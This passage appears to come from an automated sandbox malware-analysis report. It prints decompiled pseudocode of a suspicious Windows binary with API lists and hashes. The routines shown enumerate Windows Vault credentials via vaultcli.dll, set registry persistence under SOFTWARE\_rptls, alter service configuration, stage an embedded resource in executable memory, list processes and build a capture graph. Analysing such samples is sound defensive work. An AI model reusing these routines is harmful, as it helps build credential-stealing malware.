					 *((intOrPtr*)(_t45 + 0x8c)) = E0043E907(_t17, "VaultOpenVault", _t46);
					 *((intOrPtr*)(_t45 + 0x90)) = E0043E907( *(_t45 + 0xc0), "VaultCloseVault", _t46);
					_t21 = E0043E907( *(_t45 + 0xc0), "VaultEnumerateItems", _t46);
					_t43 = "VaultGetItem";
					 *((intOrPtr*)(_t45 + 0x94)) = _t21;
					 *((intOrPtr*)(_t45 + 0x98)) = E0043E907( *(_t45 + 0xc0), "VaultGetItem", _t46);
					 *((intOrPtr*)(_t45 + 0x9c)) = E0043E907( *(_t45 + 0xc0), _t43, _t46);
					_t24 = E0043E907( *(_t45 + 0xc0), "VaultFree", _t46);
					 *((intOrPtr*)(_t45 + 0xa0)) = _t24;
					if( *((intOrPtr*)(_t45 + 0x8c)) == 0 ||  *((intOrPtr*)(_t45 + 0x94)) == 0 ||  *((intOrPtr*)(_t45 + 0x90)) == 0 ||  *((intOrPtr*)(_t45 + 0x98)) == 0 || _t24 == 0) {
						goto L7;
					} else {
						return 1;
					}
				}
			}








                                      0x0043a1ff
                                      0x0043a205
                                      0x0043a207
                                      0x0043a20d
                                      0x0043a213
                                      0x0043a215
                                      0x0043a2c9
                                      0x0043a2c9
                                      0x0043a2cc
                                      0x0043a21b
                                      0x0043a21c
                                      0x0043a234
                                      0x0043a24a
                                      0x0043a250
                                      0x0043a25b
                                      0x0043a262
                                      0x0043a275
                                      0x0043a28b
                                      0x0043a291
                                      0x0043a299
                                      0x0043a2a6
                                      0x00000000
                                      0x0043a2c4
                                      0x0043a2c8
                                      0x0043a2c8
                                      0x0043a2a6

                                      APIs
                                      • LoadLibraryA.KERNEL32(vaultcli.dll), ref: 0043A207
                                        • Part of subcall function 0043E907: lstrcmpA.KERNEL32(?,0043F9CB,?,open,0043F9CB), ref: 0043E940
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoadlstrcmp
                                      • String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                      • API String ID: 2493137890-3967309459
                                      • Opcode ID: cfe1a34b35f1579b883c8e976363de6a0deeb2fc0499d3ea0aed678673c90745
                                      • Instruction ID: 4a9cc393abbc4d53e7958efbcbab76834aa6bf3cbcbcc3efae952825c0a49ff7
                                      • Opcode Fuzzy Hash: cfe1a34b35f1579b883c8e976363de6a0deeb2fc0499d3ea0aed678673c90745
                                      • Instruction Fuzzy Hash: AE114274A01B008BEB64AF329805B9376E1BF84315F54593FE4EE87785DB78AC01CB18
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0043B81D, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52serviceCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0043B81D(short** _a4, int _a8) {
				void* _t3;
				short* _t9;
				void* _t12;
				short* _t14;
				void* _t16;

				_t14 = 0;
				_t3 = OpenSCManagerW(0, L"ServicesActive", 1);
				_t16 = _t3;
				if(_t16 != 0) {
					_t12 = OpenServiceW(_t16,  *_a4, 2);
					if(_t12 != 0) {
						if(ChangeServiceConfigW(_t12, 0xffffffff, _a8, 0xffffffff, 0, 0, 0, 0, 0, 0, 0) != 0) {
							_t14 = 1;
						}
						CloseServiceHandle(_t16);
						CloseServiceHandle(_t12);
						_t9 = _t14;
					} else {
						CloseServiceHandle(_t16);
						_t9 = 0;
					}
					return _t9;
				}
				return _t3;
			}








                                      0x0043b829
                                      0x0043b82c
                                      0x0043b832
                                      0x0043b836
                                      0x0043b847
                                      0x0043b84b
                                      0x0043b86f
                                      0x0043b873
                                      0x0043b873
                                      0x0043b87b
                                      0x0043b87e
                                      0x0043b880
                                      0x0043b84d
                                      0x0043b84e
                                      0x0043b854
                                      0x0043b854
                                      0x00000000
                                      0x0043b882
                                      0x0043b886

                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0043B82C
                                      • OpenServiceW.ADVAPI32(00000000,?,00000002), ref: 0043B841
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0043B84E
                                      • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0043B867
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0043B87B
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0043B87E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                      • String ID: ServicesActive
                                      • API String ID: 493672254-3071072050
                                      • Opcode ID: 11c690618eda6fa73f9e44f70cba276c87657f934e037943a50cdf243024f44d
                                      • Instruction ID: ca1dd63e7ec14a5382d564e5acf646a1c1f96a770e9747a4b342cd203906f61f
                                      • Opcode Fuzzy Hash: 11c690618eda6fa73f9e44f70cba276c87657f934e037943a50cdf243024f44d
                                      • Instruction Fuzzy Hash: 55F0AF356042257797252B669D49F5B3A9CDF8A771B404232F715D22A1CAA88C00C6F8
                                      Uniqueness

                                      Uniqueness Score: 4.31%

                                      Function 0043F7D0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registrystringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0043F7D0(void* __ecx) {
				void* _v8;
				int _v12;
				short* _t16;

				_t16 = L"SOFTWARE\\_rptls";
				if(RegOpenKeyExW(0x80000001, _t16, 0, 0xf003f,  &_v8) != 0) {
					RegCreateKeyExW(0x80000001, _t16, 0, 0, 0, 0xf003f, 0,  &_v8,  &_v12);
				}
				RegSetValueExW(_v8, L"Install", 0, 1, 0x4468a8, lstrlenW(0x4468a8) << 2);
				return RegCloseKey(_v8);
			}






                                      0x0043f7e4
                                      0x0043f7f8
                                      0x0043f80d
                                      0x0043f80d
                                      0x0043f82f
                                      0x0043f842

                                      APIs
                                      • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,000F003F,?,00000208,004468A8,?,?,?,?,0043F87F), ref: 0043F7F0
                                      • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,00000000,00000000,000F003F,00000000,?,?,?,?,?,?,0043F87F), ref: 0043F80D
                                      • lstrlenW.KERNEL32(004468A8,?,?,?,?,0043F87F,?,?,?,?,0043535D,?,00000000,00000000), ref: 0043F819
                                      • RegSetValueExW.ADVAPI32(?,Install,00000000,00000001,004468A8,00000000,?,?,?,?,0043F87F,?,?,?,?,0043535D), ref: 0043F82F
                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,0043F87F,?,?,?,?,0043535D,?,00000000,00000000), ref: 0043F838
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateOpenValuelstrlen
                                      • String ID: Install$SOFTWARE\_rptls
                                      • API String ID: 2036214137-3226779556
                                      • Opcode ID: 933b09be1a8b168930d57f881ae5b0c7794c90dc0d6e96d028299f2ad7556ca5
                                      • Instruction ID: a23cb4388e9a69d3f24dc5d69ce0971f8c90b391210e0cbf3509f2e48584d1ec
                                      • Opcode Fuzzy Hash: 933b09be1a8b168930d57f881ae5b0c7794c90dc0d6e96d028299f2ad7556ca5
                                      • Instruction Fuzzy Hash: AFF04976500118BFE7209B96ED4DEEB7EBCEFC7791B51007ABA05E1010D6A55E00D6B8
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 0043F843, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46UNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 88%
                                      			E0043F843(void* __ebx, void* __ecx, void* __eflags) {
				long _t2;
				void* _t8;
				struct HINSTANCE__* _t13;
				void* _t15;
				struct HRSRC__* _t18;

				_t15 = __ecx;
				E00431052(0x4468a8, 0, 0x208);
				_t2 = GetModuleFileNameW(0, 0x4468a8, 0x208);
				__imp__#680();
				if(_t2 == 0 && E0043DB97() != 1) {
					E0043F7D0(_t15);
					_t13 = E0043FBFC();
					_t18 = FindResourceW(_t13, 0x66, L"WM_DSP");
					_t8 = LoadResource(_t13, _t18);
					SizeofResource(_t13, _t18);
					if(LockResource(_t8) != 0) {
						E0043F73D(_t10);
					}
				}
				return 0;
			}








                                      0x0043f843
                                      0x0043f853
                                      0x0043f85f
                                      0x0043f865
                                      0x0043f86d
                                      0x0043f87a
                                      0x0043f889
                                      0x0043f894
                                      0x0043f898
                                      0x0043f8a2
                                      0x0043f8b2
                                      0x0043f8b6
                                      0x0043f8b6
                                      0x0043f8b2
                                      0x0043f8bf

                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,004468A8,00000208,00000000,00000000,?,?,?,0043535D,?,00000000,00000000,?,?,?,00000000), ref: 0043F85F
                                      • IsUserAnAdmin.SHELL32 ref: 0043F865
                                        • Part of subcall function 0043DB97: GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,00000000), ref: 0043DBA9
                                        • Part of subcall function 0043DB97: OpenProcessToken.ADVAPI32(00000000,?,?,?,00000000), ref: 0043DBB0
                                        • Part of subcall function 0043DB97: GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,00000000), ref: 0043DBCE
                                        • Part of subcall function 0043DB97: CloseHandle.KERNEL32(00000000), ref: 0043DBE3
                                        • Part of subcall function 0043F7D0: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,000F003F,?,00000208,004468A8,?,?,?,?,0043F87F), ref: 0043F7F0
                                        • Part of subcall function 0043F7D0: RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,00000000,00000000,000F003F,00000000,?,?,?,?,?,?,0043F87F), ref: 0043F80D
                                        • Part of subcall function 0043F7D0: lstrlenW.KERNEL32(004468A8,?,?,?,?,0043F87F,?,?,?,?,0043535D,?,00000000,00000000), ref: 0043F819
                                        • Part of subcall function 0043F7D0: RegSetValueExW.ADVAPI32(?,Install,00000000,00000001,004468A8,00000000,?,?,?,?,0043F87F,?,?,?,?,0043535D), ref: 0043F82F
                                        • Part of subcall function 0043F7D0: RegCloseKey.ADVAPI32(?,?,?,?,?,0043F87F,?,?,?,?,0043535D,?,00000000,00000000), ref: 0043F838
                                        • Part of subcall function 0043FBFC: MessageBoxA.USER32(00000000,Settings not found !,DEBUG,00000000), ref: 0043FC14
                                      • FindResourceW.KERNEL32(00000000,00000066,WM_DSP), ref: 0043F88E
                                      • LoadResource.KERNEL32(00000000,00000000,?,?,?,?,0043535D,?,00000000,00000000,?,?,?,00000000), ref: 0043F898
                                      • SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,0043535D,?,00000000,00000000,?,?,?,00000000), ref: 0043F8A2
                                      • LockResource.KERNEL32(00000000,?,?,?,?,0043535D,?,00000000,00000000,?,?,?,00000000,?,?,00000000), ref: 0043F8A9
                                        • Part of subcall function 0043F73D: VirtualProtect.KERNEL32(00000000,000007D0,00000040,00000000,00000000,00000000,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000), ref: 0043F77B
                                        • Part of subcall function 0043F73D: VirtualAlloc.KERNEL32(00000000,000001FE,00001000,00000040,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000,00000000), ref: 0043F78F
                                        • Part of subcall function 0043F73D: GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000,00000000,?,?,?), ref: 0043F79D
                                        • Part of subcall function 0043F73D: lstrlenW.KERNEL32(00000000,\System32\cmd.exe,00000028,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000,00000000), ref: 0043F7AB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Resource$CloseOpenProcessTokenVirtuallstrlen$AdminAllocCreateCurrentDirectoryFileFindHandleInformationLoadLockMessageModuleNameProtectSizeofUserValueWindows
                                      • String ID: WM_DSP
                                      • API String ID: 1126923897-506093727
                                      • Opcode ID: 2ce587da833a5332d837c24db7ceec7269d8d62c21a0719195cd0562a892b368
                                      • Instruction ID: 92b0bf4d33d3164a60508a7a20e6a4243c03f592821922342082d42ea90b31a1
                                      • Opcode Fuzzy Hash: 2ce587da833a5332d837c24db7ceec7269d8d62c21a0719195cd0562a892b368
                                      • Instruction Fuzzy Hash: 1AF06276A0025067E72437766C4DF5F2A6C9FCB711F421436F505E6252DBAC8C41867D
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0043582B, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 20libraryloaderCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 68%
                                      			E0043582B(void* __ecx) {
				_Unknown_base(*)()* _t2;
				void* _t4;

				_t4 = __ecx;
				_t2 = GetProcAddress(LoadLibraryA("USER32.DLL"), "MessageBoxA");
				if(_t4 == 0) {
					if(_t2 != 0) {
						_t2 =  *_t2(0, "An assertion condition failed", "Assert", 0x2010);
					}
					ExitProcess(1);
				}
				return _t2;
			}





                                      0x00435831
                                      0x0043583f
                                      0x00435848
                                      0x0043584c
                                      0x0043585f
                                      0x0043585f
                                      0x00435863
                                      0x00435863
                                      0x00435869

                                      APIs
                                      • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00435833
                                      • GetProcAddress.KERNEL32(00000000,MessageBoxA,?,00000000,?,?,?,?,?,?,?,004355EF,?,00000000,.bss,00000000), ref: 0043583F
                                      • ExitProcess.KERNEL32 ref: 00435863
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressExitLibraryLoadProcProcess
                                      • String ID: An assertion condition failed$Assert$MessageBoxA$USER32.DLL
                                      • API String ID: 881411216-1361702557
                                      • Opcode ID: 15b455a85311c8f954ec6b043a2c2e6ccd6960b5f3782e624350d83a2cfe0c94
                                      • Instruction ID: acf4e4984b6a7741b49bbccdce677fa351c24c0411e6152029d0fc86d2c82444
                                      • Opcode Fuzzy Hash: 15b455a85311c8f954ec6b043a2c2e6ccd6960b5f3782e624350d83a2cfe0c94
                                      • Instruction Fuzzy Hash: 8ED05E707C03003AFE1037A01F0AF6A2A689B26F02FA81922BB40A60C2C9D94450812D
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 00435AF2, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 14libraryloaderCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 68%
                                      			E00435AF2() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("USER32.DLL"), "MessageBoxA");
				if(_t2 != 0) {
					 *_t2(0, "A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application", "PureCall", 0x2010);
				}
				ExitProcess(1);
			}




                                      0x00435b03
                                      0x00435b0b
                                      0x00435b1e
                                      0x00435b1e
                                      0x00435b22

                                      APIs
                                      • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00435AF7
                                      • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00435B03
                                      • ExitProcess.KERNEL32 ref: 00435B22
                                      Strings
                                      • USER32.DLL, xrefs: 00435AF2
                                      • PureCall, xrefs: 00435B12
                                      • A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application, xrefs: 00435B17
                                      • MessageBoxA, xrefs: 00435AFD
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressExitLibraryLoadProcProcess
                                      • String ID: A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application$MessageBoxA$PureCall$USER32.DLL
                                      • API String ID: 881411216-4134947204
                                      • Opcode ID: 6aadc18dd1cfe4ad3c1e9b2468a78b8f0e6b8b1ab637586429db80bb92e1c5d0
                                      • Instruction ID: 778c715a780ef77a6bdf08f1dc1ea72b1e932459f482c230eb6d2bf8d458d404
                                      • Opcode Fuzzy Hash: 6aadc18dd1cfe4ad3c1e9b2468a78b8f0e6b8b1ab637586429db80bb92e1c5d0
                                      • Instruction Fuzzy Hash: 2AD0E9343803056AF6543BA16F1EF6D2924AB19F02FD44936B705B40D2C9E9A550862D
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 0043ECC2, Relevance: 12.2, APIs: 8, Instructions: 164processCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 85%
                                      			E0043ECC2(void* __ecx, void* __edx, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				int _v36;
				intOrPtr _v40;
				int _v44;
				char _v568;
				long _v596;
				char _v600;
				void* _v604;
				char _v1644;
				intOrPtr _t49;
				int _t54;
				struct tagPROCESSENTRY32W* _t57;
				int _t73;
				int _t77;
				int _t89;
				void* _t91;
				void* _t112;
				void* _t113;
				void* _t115;
				void* _t117;
				signed int _t119;
				void* _t120;
				signed int _t122;
				void* _t123;
				intOrPtr* _t124;
				void* _t125;

				_t125 = __eflags;
				_t112 = __edx;
				_t91 = __ecx;
				E00431052( &_v600, 0, 0x228);
				_t124 = _t123 + 0xc;
				_v604 = 0x22c;
				_v36 = 0;
				_t49 = 5;
				_v32 = _t49;
				_v40 = _t49;
				E00431683( &_v44, _t125);
				_t113 = CreateToolhelp32Snapshot(2, 0);
				if(_t113 == 0xffffffff) {
					L14:
					E004312BA(_t91, __eflags,  &_v44);
					_t54 = _v44;
					__eflags = _t54;
					if(_t54 != 0) {
						_t119 =  *(_t54 - 4);
						_t115 = _t119 * 0xc + _t54;
						__eflags = _t119;
						if(_t119 != 0) {
							do {
								_t115 = _t115 - 0xc;
								E004313B6(_t115);
								_t119 = _t119 - 1;
								__eflags = _t119;
							} while (_t119 != 0);
						}
					}
				} else {
					_t57 =  &_v604;
					Process32FirstW(_t113, _t57);
					_t127 = _t57;
					if(_t57 != 0) {
						do {
							_v16 = _v596;
							_v12 = 0;
							_v8 = 0;
							E0043312C( &_v12, _t112,  &_v568);
							_t120 = OpenProcess(0x1410, 0, _v596);
							__eflags = _t120 - 0xffffffff;
							if(_t120 == 0xffffffff) {
								E00433264( &_v8, E00433412( &_v28, "-"));
								E00435A2D(_v28);
								_t34 =  &_v28;
								 *_t34 = _v28 & 0x00000000;
								__eflags =  *_t34;
							} else {
								E00431052( &_v1644, 0, 0x410);
								_t124 = _t124 + 0xc;
								_t77 =  &_v1644;
								__imp__GetModuleFileNameExW(_t120, 0, _t77, 0x208);
								__eflags = _t77;
								if(_t77 == 0) {
									E00433264( &_v8, E00433412( &_v24, "-"));
									E00435A2D(_v24);
									_t29 =  &_v24;
									 *_t29 = _v24 & 0x00000000;
									__eflags =  *_t29;
								} else {
									E00433264( &_v8, E00433412( &_v20,  &_v1644));
									E00435A2D(_v20);
									_v20 = _v20 & 0x00000000;
								}
								CloseHandle(_t120);
							}
							_t124 = _t124 - 0xc;
							_t121 = _t124;
							 *_t124 = _v16;
							E0043345A(_t121 + 4,  &_v12);
							E0043345A(_t121 + 8,  &_v8);
							E00431560( &_v44);
							E004313B6( &_v16);
							_t73 = Process32NextW(_t113,  &_v604);
							_push(0);
							_pop(0);
							__eflags = _t73;
						} while (__eflags != 0);
						CloseHandle(_t113);
						goto L14;
					} else {
						CloseHandle(_t113);
						E004312BA(_t91, _t127,  &_v44);
						_t89 = _v44;
						if(_t89 != 0) {
							_t122 =  *(_t89 - 4);
							_t117 = _t122 * 0xc + _t89;
							if(_t122 != 0) {
								do {
									_t117 = _t117 - 0xc;
									E004313B6(_t117);
									_t122 = _t122 - 1;
								} while (_t122 != 0);
							}
						}
					}
				}
				return _t91;
			}



































                                      0x0043ecc2
                                      0x0043ecc2
                                      0x0043ecdd
                                      0x0043ecdf
                                      0x0043ece4
                                      0x0043ece7
                                      0x0043ecf4
                                      0x0043ecf9
                                      0x0043ecfa
                                      0x0043ecfd
                                      0x0043ed00
                                      0x0043ed0e
                                      0x0043ed13
                                      0x0043ee9b
                                      0x0043eea1
                                      0x0043eea6
                                      0x0043eea9
                                      0x0043eeab
                                      0x0043eead
                                      0x0043eeb3
                                      0x0043eeb5
                                      0x0043eeb7
                                      0x0043eeb9
                                      0x0043eeb9
                                      0x0043eebe
                                      0x0043eec3
                                      0x0043eec3
                                      0x0043eec3
                                      0x0043eeb9
                                      0x0043eeb7
                                      0x0043ed19
                                      0x0043ed19
                                      0x0043ed21
                                      0x0043ed27
                                      0x0043ed29
                                      0x0043ed6c
                                      0x0043ed75
                                      0x0043ed7f
                                      0x0043ed82
                                      0x0043ed85
                                      0x0043ed9c
                                      0x0043ed9e
                                      0x0043eda1
                                      0x0043ee38
                                      0x0043ee40
                                      0x0043ee45
                                      0x0043ee45
                                      0x0043ee45
                                      0x0043eda7
                                      0x0043edb5
                                      0x0043edba
                                      0x0043edbd
                                      0x0043edcc
                                      0x0043edd2
                                      0x0043edd4
                                      0x0043ee0d
                                      0x0043ee15
                                      0x0043ee1a
                                      0x0043ee1a
                                      0x0043ee1a
                                      0x0043edd6
                                      0x0043ede9
                                      0x0043edf1
                                      0x0043edf6
                                      0x0043edf6
                                      0x0043ee1f
                                      0x0043ee1f
                                      0x0043ee4c
                                      0x0043ee4f
                                      0x0043ee51
                                      0x0043ee5a
                                      0x0043ee66
                                      0x0043ee6e
                                      0x0043ee76
                                      0x0043ee83
                                      0x0043ee89
                                      0x0043ee8b
                                      0x0043ee8c
                                      0x0043ee8c
                                      0x0043ee95
                                      0x00000000
                                      0x0043ed2b
                                      0x0043ed2c
                                      0x0043ed38
                                      0x0043ed3d
                                      0x0043ed42
                                      0x0043ed48
                                      0x0043ed4e
                                      0x0043ed52
                                      0x0043ed58
                                      0x0043ed58
                                      0x0043ed5d
                                      0x0043ed62
                                      0x0043ed62
                                      0x0043ed67
                                      0x0043ed52
                                      0x0043ed42
                                      0x0043ed29
                                      0x0043eece

                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0043ED08
                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0043ED21
                                      • CloseHandle.KERNEL32(00000000), ref: 0043ED2C
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                        • Part of subcall function 00433264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00433289
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      • OpenProcess.KERNEL32(00001410,00000000,?,?), ref: 0043ED96
                                      • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 0043EDCC
                                      • CloseHandle.KERNEL32(00000000), ref: 0043EE1F
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0043EE83
                                      • CloseHandle.KERNEL32(00000000), ref: 0043EE95
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle$Process32lstrcpylstrlen$CreateFileFirstFreeModuleNameNextOpenProcessSnapshotToolhelp32Virtual
                                      • String ID:
                                      • API String ID: 3514491001-0
                                      • Opcode ID: b96bc3a2db991f8fb6f0ad84535f018366c4b9fc661b03ef3fa1918d4617a1b4
                                      • Instruction ID: ca3e8b645e29a8fdb8d7813faec3b1b3042788899ce31f3bdb840681be9bfdce
                                      • Opcode Fuzzy Hash: b96bc3a2db991f8fb6f0ad84535f018366c4b9fc661b03ef3fa1918d4617a1b4
                                      • Instruction Fuzzy Hash: 0F51B372D011199BDB10EBA1CD8AAEFBB78AF48715F01116AF401B32D1DB785F45CB98
                                      Uniqueness

                                      Uniqueness Score: 5.06%

                                      Function 00440AD0, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 168comCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 55%
                                      			E00440AD0(signed int __ecx, signed int _a4) {
				intOrPtr _v38;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _v112;
				char _v128;
				intOrPtr _v132;
				char _v200;
				intOrPtr _t49;
				intOrPtr* _t54;
				intOrPtr* _t58;
				intOrPtr* _t60;
				intOrPtr* _t71;
				signed int _t76;
				intOrPtr* _t78;
				intOrPtr* _t79;
				intOrPtr* _t80;
				intOrPtr* _t85;
				signed int _t91;
				intOrPtr* _t96;
				intOrPtr* _t97;
				intOrPtr* _t104;
				signed int _t107;
				intOrPtr* _t111;
				intOrPtr* _t112;
				intOrPtr* _t113;
				intOrPtr* _t118;
				void* _t119;
				void* _t120;
				void* _t121;

				_t76 = __ecx;
				__imp__CoInitialize(0);
				_t1 = _t76 + 0x18; // 0x1209a8
				_t111 = _t1;
				__imp__CoCreateInstance(0x442560, 0, 1, 0x444854, _t111);
				_t78 =  *_t111;
				if(_t78 != 0) {
					_t2 = _t76 + 0x1c; // 0x1209ac
					_t104 = _t2;
					_t49 =  *((intOrPtr*)( *_t78))(_t78, 0x442540, _t104);
					_t79 =  *_t104;
					if(_t79 != 0) {
						_t49 =  *((intOrPtr*)( *_t79 + 4))(_t79);
						_t4 = _t76 + 0x20; // 0x1209b0
						_t112 = _t4;
						if(_t112 != 0) {
							_t49 = E00440831(_a4, _t112);
						}
						if( *_t112 != 0) {
							_t6 = _t76 + 0x24; // 0x1209b4
							_t113 = _t6;
							__imp__CoCreateInstance(0x4425b0, 0, 1, 0x444844, _t113);
							_t80 =  *_t113;
							if(_t80 != 0) {
								_t7 = _t76 + 0x20; // 0x0
								 *((intOrPtr*)( *_t80 + 0xc))(_t80,  *_t7, L"Source");
								_t54 =  *_t113;
								 *((intOrPtr*)( *_t54 + 0xc))(_t54,  *_t104, L"Grabber");
								E00431052( &_v128, 0, 0x48);
								_t11 = _t76 + 0x18; // 0x0
								_t58 =  *_t11;
								_t121 = _t120 + 0xc;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
